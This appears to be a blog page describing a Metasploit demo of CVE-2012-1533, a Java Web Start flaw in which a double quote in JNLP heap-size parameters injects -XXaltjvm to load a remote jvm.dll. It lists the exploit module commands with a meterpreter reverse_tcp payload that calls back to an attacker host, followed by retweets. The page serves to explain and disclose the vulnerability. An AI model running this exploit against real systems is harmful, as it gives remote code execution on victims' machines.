Timeline :
Vulnerability fixed by Oracle the 2012-10-16
Details on the vulnerability provided by Rh0 the 2013-06-09
Metasploit PoC provided the 2013-06-12
PoC provided by :
Rh0
Reference(s) :
CVE-2012-1533
OSVDB-86348
BID-56046
Oracle Java SE Critical Patch Update Advisory – October 2012
Rh0 Pastebin
Affected version(s) :
JSE 7 Update 7 and before
JSE 6 Update 35 and before
Tested on Windows XP Pro with :
JSE 7 Update 7
Description :
This module exploits a flaw in the Web Start component of the Oracle Java Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of a browser user. This flaw was fixed in Oct. 2012 and affects JSE 6 Update 35 and before, and JSE 7 Update 7 and before. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. Alternatively an UNC path containing a jvm.dll can be specified with an own SMB server.
Commands :
use exploit/windows/browser/java_ws_double_quote set SRVHOST 192.168.178.36 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
#CVE -2012-1533 #Oracle #Java Web Start Vulnerability #Metasploit Demo http://t.co/5b7lwdB6NI
RT @Hfuhs: CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo – http://t.co/knQK3Ewtb2
RT @ubersec: CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo: http://t.co/jR38xHFPBV
CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo: http://t.co/jR38xHFPBV
CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo http://t.co/H9iiBMUIYY via @zite
Java vulnerável de novo? LOL CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo: http://t.co/ytUq5cDkHg
CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo – http://t.co/knQK3Ewtb2
RT @eromang: CVE-2012-1533 Oracle Java Web Start Vulnerability Metasploit Demo http://t.co/cMsvYotcUb